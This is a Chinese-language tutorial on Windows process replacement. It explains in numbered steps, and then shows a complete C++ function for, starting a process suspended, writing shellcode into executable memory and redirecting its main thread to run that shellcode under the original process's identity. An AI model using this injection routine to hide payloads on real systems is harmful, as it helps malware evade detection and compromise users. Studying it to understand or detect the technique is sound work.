实现原理:
以挂起的方式打开目标进程,将ShellCode代码写入目标进程,并修改目标进程的执行流程,使其转而执行ShellCode代码,这样,进程还是目标原本进程,但执行的操作却替换成我们的ShellCode了。
实现过程:
(1).调用CreateProcess以挂起的方式(CREATE_SUSPENDED)创建进程
(2).调用VirtualAllocEx函数申请一个可读、可写、可执行的内存
(3).调用WriteProcessMemory将Shellcode数据写入刚申请的内存中
(4).调用GetThreadContext,设置获取标志为CONTEXT_FULL,即获取新进程中所有线程的上下文
(5).修改线程上下文中EIP的值为申请的内存的首地址,通过SetThreadContext函数设置回主线程中
(6).调用ResumeThread恢复主线程
注意:在使用GetThreadContext获取线程上下文的时候,一定要对上下文结构中的ContextFlags成员赋值,指明要检索线程上下文的哪些部分,否则会导致程序不能实现到想要的效果。此次ContextFlags赋值为CONTEXT_FULL,这表示获取所有线程的上下文信息。
实现代码:
//************************************ // 函数名:CHideDlg::ReplaceProcess // 返回类型:BOOL // 功能: 使用ShellCode替换目标进程 // 参数1:char *pszFilePath 目标进程路径 // 参数2:PVOID pReplaceData Shellcode首地址 // 参数3:DWORD dwReplaceDataSize Shellcode大小(字节) // 参数4:DWORD dwRunOffset Shellcode中开始代码相对首地址的偏移 //************************************ BOOL CHideDlg::ReplaceProcess(char *pszFilePath, PVOID pReplaceData, DWORD dwReplaceDataSize, DWORD dwRunOffset) { STARTUPINFOA si = { 0 }; PROCESS_INFORMATION pi = { 0 }; CONTEXT threadContext = { 0 }; BOOL bRet = FALSE; ::RtlZeroMemory(&si, sizeof(si)); ::RtlZeroMemory(&pi, sizeof(pi)); ::RtlZeroMemory(&threadContext, sizeof(threadContext)); si.cb = sizeof(si); // 创建进程并挂起主线程 bRet = ::CreateProcessA(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); if (FALSE == bRet) { MessageBox(_T("创建挂起主线程失败!")); return FALSE; } // 在进程中申请一块内存 LPVOID lpDestBaseAddr = ::VirtualAllocEx(pi.hProcess, NULL, dwReplaceDataSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (NULL == lpDestBaseAddr) { MessageBox(_T("申请内存失败!")); return FALSE; } // 写入Shellcode数据 bRet = ::WriteProcessMemory(pi.hProcess, lpDestBaseAddr, pReplaceData, dwReplaceDataSize, NULL); if (FALSE == bRet) { MessageBox(_T("写入Shelcode失败!")); return FALSE; } // 获取线程上下文 threadContext.ContextFlags = CONTEXT_FULL; bRet = ::GetThreadContext(pi.hThread, &threadContext); if (FALSE == bRet) { MessageBox(_T("获取线程上下文失败!")); return FALSE; } // 修改进程中PE文件的入口地址 threadContext.Eip = (DWORD)lpDestBaseAddr + dwRunOffset; // 设置挂起进程的线程上下文 bRet = ::SetThreadContext(pi.hThread, &threadContext); if (FALSE == bRet) { MessageBox(_T("设置挂起线程的上下文失败!")); return FALSE; } // 恢复挂起进程的线程 ::ResumeThread(pi.hThread); return TRUE; }